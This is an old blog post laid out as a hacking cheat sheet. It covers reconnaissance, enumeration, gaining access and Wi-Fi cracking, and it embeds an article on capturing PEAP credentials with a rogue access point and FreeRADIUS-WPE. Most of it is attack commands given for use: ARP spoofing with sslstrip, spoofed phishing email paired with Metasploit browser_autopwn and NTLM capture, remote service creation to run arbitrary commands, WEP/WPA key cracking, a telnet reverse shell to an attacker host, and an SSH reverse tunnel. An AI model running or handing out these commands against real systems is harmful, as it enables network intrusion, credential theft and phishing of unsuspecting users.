Monday, July 30, 2012

Basic Steps of Hacking



INFORMATION GATHERING



  • Harvesting email addresses: - 
    • theharvester.py -d <domain> -l 100 -b google or linkedin  
  • Enumerating Subdomains: - 
    • fierce.pl -dns example.com
    • maltego
    • google - site:example.com -www  
  • IP Ranges: - 
    • whois
    • ipnetinfo.exe
    • reverse host lookups on found subdomains to find extra ranges - for hostname in $(cat subdomains.txt);do host $hostname;done
  • Extracting usernames and other info from metadata: -
    •  metagoofil -d <domain> -l 20 -f all -o output.html -t /tmp
  • Finding vulnerable servers: -

SCANNING

  • Scanning for snmp: -
    • create a list of ip addresses: - for i in `seq 1 255`;do echo 192.168.1.$i;done >ips.txt
    • find vulnerable servers: - onesixtyone -i ips.txt public
  • Netbios info: - nmap -p139 --script nbstat.nse 192.168.1.* |grep user
  • Finding open egress ports: nmap open.zorinaq.com or telnet  open.zorinaq.com <port>

ENUMERATION


  • Enumerating usernames: -
    • from a domain pc: - net users /domain
    • nmap -p445 --script=smb-enum-users <IP> >users.txt
  • Enumerating via snmp: -
    • create a list of ip addresses: - for i in `seq 1 255`;do echo 192.168.1.$i;done >ips.txt
    • find vulnerable servers: - onesixtyone -i ips.txt public
    • enumerate snmp info: - snmpcheck -t <IP> -w
    • Via Metasploit to grab users/groups/computernames: - use auxillary/scanner/smb/smb_lookupsid

    GAINING ACCESS

    • Via a public exploit: - 
      • search exploitdb for code, check headers for compile info i.e. windows.h (windows) or / sys/socket.h (linux), tailor for use then compile.
      • To compile for windows: - either install windows SDK and run cl file.c or within backtrack run root@bt:~/.wine/drive_c/MinGW/bin# wine gcc -o sploit.exe sploit.c -lwsock32
      • To compile for linux: - gcc file.c -o sploit
    • Via password bruteforce: -
      • check out domain account bruteforce tool in september blog post.
      • hydra / medusa are amoungst the best.
    • Via arpspoofing: -
      • 1. uncomment iptables entries in /etc/etter.conf
        2. echo 1 > /proc/sys/net/ipv4/ip_forward
        3. iptables -t nat -A PREROUTING -i <interface> -p tcp --dport 80 -j REDIRECT --to-port 8080
        4. ettercap -i wlan0 -TqM ARP:REMOTE /TARGET1IP/ /TARGET2IP/
        5. sslstrip -a -l 8080 
    • Via a fishing attack: -
      • Setup a metasploit browser exploit generator
        • msfcli auxiliary/server/browser_autopwn lhost=<ATTACKERIP> lport=80 srvhost=<ATTACKERIP> uripath=reports E
        • Spoof an email to the target users with a link to your reports folder:
        • sendemail -t <target_email> -f <spoofed_email> -s <smtp_server> -u <subject>
      • Use metasploit to capture logons
        • use auxiliary/server/capture/http_ntlm set  - set uripath to exchange
        • spoof email to fish users - i.e. "Check out your new outlook web access portal"
      • Use SMB relay
        • Metasploit:  windows/smb/smbrelay- payloads delivered when users connect to \\<ATTACKERIP>\any_fake_share
    • Via Weak SSH Keys: -
      • download weak debian key checker tool from HERE
      • Search for hosts running SSH: nmap -p22 <IPRANGE> --open |grep report |cut -d" " -f5 > ssh-hosts.txt
      • Find vulnerable hosts: for i in $(cat ssh-hosts.txt);do perl dowkd.pl host $i;done
      • Follow the rest of the instructions HERE to exploit.
    • Via Weak Service Permissions: -
    • sc \\<TARGET> create <evilservice> binpath= “cmd.exe /k <EVIL COMMAND> then sc \\<TARGET> start <evilservice>
       
    • Via NFS shares: 
      • showmount -e <IP>
      • mount -t nfs IP:/sharename /tmp/mount
      • to bypass permissions: nfspy -o server=<serverIP>:/<share_name>,hide,allow_other,ro,intr /tmp/mnt
    • Creating wordlists:
      • http://sites.google.com/site/reusablesec/Home/password-cracking-tools/noobify

    WIFI HACKING



    •  WEP:
      • airmon-ng start wlan0
        airodump-ng wlan0
        airodump-ng -w essid -c channel --bssid mac wlan0
        aireplay -1 0 -a bssid -h localmac wlan0
        aireplay -3 -b bssid -h localmac wlan0
        aircrack-ng -n 64 --bssid tgt mac file.cap
        airmon-ng stop wlan0
        /etc/init.d./networking start
        NetworkManager start
        Start-network
      • wesside-ng -i mon0
      • Gerix


      • WPA:
        • airmon-ng start wlan0airodump-ng wlan0
          airodump-ng -w essid -c channel --bssid mac wlan0
          aireplay -0 3 -a <targetmac> -c <client to deauth> wlan0 wait for handshake to be captured when client reconnects.
          aircrack-ng -w passwords.txt -b <targetmac> pskfile.cap or faster way - import cap file into elcomsoft wireless auditor
        • besside-ng
        • Gerix




      • KEY CRACKING

      Capturing and cracking a PEAP challenge/response with FreeRADIUS-WPE

      By Robert Portvliet.

      I figured I would put together a quick post on configuring and using FreeRADIUS-WPE, as lately I’ve seen a few people have issues getting it going on Backtrack 5 R2. To perform a successful attack we’re going to need a couple items, which are the updated FreeRADIUS-WPE package Brad Antoniewicz put together a few months back, and hostapd for our malicious AP. We’re also going to need to put together a .conf file for hostapd to run from.

      After booting into Backtrack, go to http://blog.opensecurityresearch.com/2011/09/freeradius-wpe-updated.html, and download freeradius-server-wpe_2.1.11-1_i386.deb.

      To install, type:
      dpkg --install freeradius-server-wpe_2.1.11-1_i386.deb
      Then:
      ldconfig
      Next install hostapd:
      apt-get install hostapd

      Run the FreeRADIUS-WPE setup from the Backtrack menu, which runs the following:
      sh -c "cd /pentest/libs/freeradius-wpe/raddb/certs && ./bootstrap && cp -r * /usr/local/etc/raddb/certs;sudo -s"

      The output should finish up looking something like this:

      Then, we test that FreeRADIUS is working by:
      radiusd -X 

      ("-X" turns on full debugging). It will scroll a bunch of information on the screen, and should end up with the following:

      Next, we need a configuration file for hostapd to run from. Here is one Brad Antoniewicz put together a while ago:
      interface=mon0
      driver=nl80211
      ssid="corporateWIFI"
      logger_stdout=-1
      logger_stdout_level=0
      dump_file=/tmp/hostapd.dump
      ieee8021x=1
      eapol_key_index_workaround=0
      own_ip_addr=127.0.0.1
      auth_server_addr=127.0.0.1
      auth_server_port=1812
      auth_server_shared_secret=testing123
      wpa=1
      channel=1
      wpa_pairwise=TKIP CCMP

      Start a monitor mode interface with:
      airmon-ng start wlan0

      (or in my case wlan1), which will give you the mon0 monitor mode interface.

      Next start hostapd and specify the configuration file:

      Now that we have hostapd and FreeRADIUS-WPE running, connect to the “corporateWIFI” SSID with your test client and input your credentials. You should see activity in your hostapd window at this point, which will look something like this:

      Your client will tell you the login failed (obviously), but if all goes well, when you tail the FreeRADIUS-WPE log, located at /usr/local/var/log/radius/freeradius-server-wpe.log, you’ll see the username, challenge, and response:

      Finally, we can use asleap to attempt to crack the challenge/response.

      Obviously, you are limited strictly to the words in your wordlist when using asleap, but if you want you can feed the challenge/response to John and use its mangling capabilities. Josh Kelley created a neat Python script called radiusWPE2john.py, which I happened upon on pastebin (http://pastebin.com/RJwgbwNh) that takes the FreeRADIUS-WPE log output and converts the challenge/response into a format that John can understand. Here's a copy of it:
      #!/usr/bin/python

      ###############################################################################
      # Free Radius WPE log file convertor to John The Ripper formatted file for
      # password cracking. Use the following format for John:
      # ./john --format=NETNTLM freeradius.john
      #
      # 12/19/2011 - Josh Kelley
      ###############################################################################

      import sys

      if len(sys.argv) < 2:
      print "Please feed me the path to the Free Radius WPE log file"
      exit()

      fileIn = open(sys.argv[1],'r')
      fileOut = open('freeradius.john','w')

      i = 0
      for line in fileIn:
      lineClean = line.strip()
      lineSplit = lineClean.split(':')
      if lineSplit[0] == "mschap":
      i = i + 1
      if lineSplit[0] == "username":
      username = lineSplit[1].strip()
      i = i + 1
      if lineSplit[0] == "challenge":
      challenge = ""
      for x in lineSplit[1:]:
      challenge = challenge + x
      challenge = challenge.strip()
      i = i + 1
      if lineSplit[0] == "response":
      response = ""
      for x in lineSplit[1:]:
      response = response + x
      response = response.strip()
      i = i + 1
      if i == 4:
      lineNew = "%s:$NETNTLM$%s$%s" % (username, challenge, response)
      fileOut.write("%s\n" % lineNew.strip('\n'))
      i = 0
      fileIn.close()
      fileOut.close()


      Run radiusWPE2john.py and point it to the FreeRADIUS-WPE log. It will generate thefreeradius.john file with the challenge/ response converted to the proper formatting for John.

      Then, simply feed John the freeradius.john file. The comments in RadiusWPE2John give the example of using the argument --format=NETNTLM, but John doesn’t seem to find the hashes when given it. It does find them when using no argument though. (YMMV)

      Of course, you can also just pipe the output from John into asleap, as shown below. Make sure to include the dash after the –W switch for asleap. That makes the magic happen. Incidentally, you can do the same thing with CoWPAtty and Aircrack, in both cases putting a dash after the wordlist (-w) parameter let’s you take stdout from John to perform wordlist mangling.

      PLACES TO LEARN

      USEFUL COMMANDS

      • LINUX
      • Grepping multiple strings: egrep -i "string1|string2"  e.g. nmap -sV -p21 10.0.0.* --open |egrep -i "report|open"
      • Creating ip lists: for i in `seq 1 255`;do echo 192.168.1.$i;done >ips.txt
      • Switching to previous directory: cd -
      • Switching to home directory: cd
      • Creating shortcut commands: alias netstat='netstat -antp' or even make up your own commands: i.e. alias makeips='for i in `seq 1 255`;do echo 192.168.1.$i;done'
      • Viewing installed software:
        • Debian based: dpkg --get-selections 
        • RPM based distributions (RHEL, Fedora Core, Cent OS, Suse Linux etc)rpm -qa
      • Searching for Information:
        • find / -name passw*- Search for filenames starting with passw
        • find / | xargs passw - Search for files that contain passw in them.
        • man -k <search_string> (e.g man -k ftp) - will list all man pages that refer to ftp.
      • Reverse netcat shell without netcat:
        • Attacker: nc -lvp 1234
        • Target: mknod backpipe p && telnet <ATTACKERIP> 1234 0<backpipe | /bin/bash 1>backpipe
      • Reverse SSH tunnel:
        • setup ssh: service ssh start && sshd-generate
        • upload plink to target:
        • create reverse tunnel: plink.exe -l root -pw <your ssh pass> -R 3389:127.0.0.1:3389 <attackerIP>  (will map targets rdp port to yours)
        • rdp into yourself to access target: rdesktop 127.0.0.1 -f
          • Finding open egress ports: nmap open.zorinaq.com
        • Open all HTTP hosts on network in firefox: for i in $(nmap -p80 -n 192.168.0.* --open |grep report |cut -d" " -f5);do firefox -new-tab $i;done (have firefox open before running)
        • Simple Web Server: python -m SimpleHTTPServer
        • copying files via scp: scp *.txt <targetip>:

          • WINDOWS
            • quick ping sweep: for /L %i in (1,1,255) do @ping -n 1 192.168.1.%i |findstr TTL

          No comments:

          Post a Comment